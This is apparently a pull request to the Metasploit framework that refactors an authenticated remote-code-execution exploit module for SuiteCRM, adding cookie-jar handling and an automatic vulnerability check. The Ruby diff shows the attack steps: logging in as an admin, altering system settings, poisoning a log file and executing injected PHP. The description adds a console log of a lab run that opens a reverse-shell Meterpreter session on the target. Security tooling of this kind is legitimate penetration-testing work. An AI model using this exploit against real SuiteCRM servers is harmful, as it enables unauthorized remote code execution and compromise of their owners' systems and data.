### PR TITLE
add cookie jar usage and AutoCheck

### DIFF
--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::CmdStager
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -36,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
             ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
           ],
-        'Payload' => {},
         'Platform' => %w[linux unix],
         'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
         'Targets' =>
@@ -85,13 +85,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    @authenticated = false
     return Exploit::CheckCode::Unknown unless authenticate
 
     version_check_request = send_request_cgi(
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Home',
           'action' => 'About'
@@ -132,6 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Users',
           'action' => 'Login'
@@ -141,13 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return false unless initial_req && initial_req.code == 200
 
-    initial_cookie = initial_req.get_cookies
-
     login = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'index.php'),
-        'cookie' => initial_cookie,
+        'keep_cookies' => true,
         'vars_post' => {
           'module' => 'Users',
           'action' => 'Authenticate',
@@ -162,13 +162,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return false unless login && login.code == 302
 
-    @cookie = login.get_cookies
-
     res = send_request_cgi(
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri, 'index.php'),
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Administration',
           'action' => 'index'
@@ -191,6 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good("#{datastore['USER']} has administrative rights.")
         @is_admin = true
       end
+      @authenticated = true
       return true
     else
       print_error("Failed to authenticate as: #{datastore['USER']}")
@@ -204,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'index.php'),
         'ctype' => "multipart/form-data; boundary=#{data.bound}",
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'headers' => {
           'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
         },
@@ -306,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'uri' => normalize_uri(target_uri, @php_fname),
-        'cookie' => @cookie
+        'keep_cookies' => true
       }
     )
     fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
@@ -335,7 +334,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     start_http_server
-    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless authenticate
+    authenticate unless @authenticated
+    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
     fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
     modify_system_settings_file
     poison_log_file


### PR DESCRIPTION
Hey! I made a couple of minor changes to your module. Instead of manually keeping track of cookies, we've recently added the ability for the module to handle cookies by setting `keep_cookies` to `true` in the http requests. This also adds the usage of `AutoCheck`, which allows the user to run the `check` method automatically upon running the exploit. I added a new variable to ensure that if the `check` method runs and successfully authenticates, `authenticate()` won't be run again in the exploit method. Let me know if these changes work for you, thanks!

```
msf6 > use exploit/linux/http/suitecrm_log_file_rce 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/suitecrm_log_file_rce) > set lhost 192.168.37.75
lhost => 192.168.37.75
msf6 exploit(linux/http/suitecrm_log_file_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/suitecrm_log_file_rce) > set user user
user => user
msf6 exploit(linux/http/suitecrm_log_file_rce) > set pass bitnami
pass => bitnami
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.37.75:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Authenticating as user
[+] Authenticated as: user
[+] user has administrative rights.
[+] The target appears to be vulnerable. SuiteCRM 7.11.18
[*] Using URL: http://0.0.0.0:8080/ApWCt506qBtzro
[*] Local IP: http://192.168.1.94:8080/ApWCt506qBtzro
[*] Trying - Modify system settings file
[+] Succeeded - Modify system settings file
[*] Trying - Poison log file
[+] Succeeded - Poison log file
[*] Executing php code in log file: pU3VsKLS.pHp
[+] 127.0.0.1:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.37.75:4444 -> 192.168.37.75:51863) at 2021-06-02 13:07:32 -0500
[*] Trying - Restore logging to default configuration
[+] Succeeded - Restore logging to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of 'pU3VsKLS.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/1Y7hEqeQ' on the target

meterpreter > getuid
Server username: daemon @ f63b952a0cf9 (uid=1, gid=1, euid=1, egid=1)
meterpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 10.9 (Linux 5.10.25-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```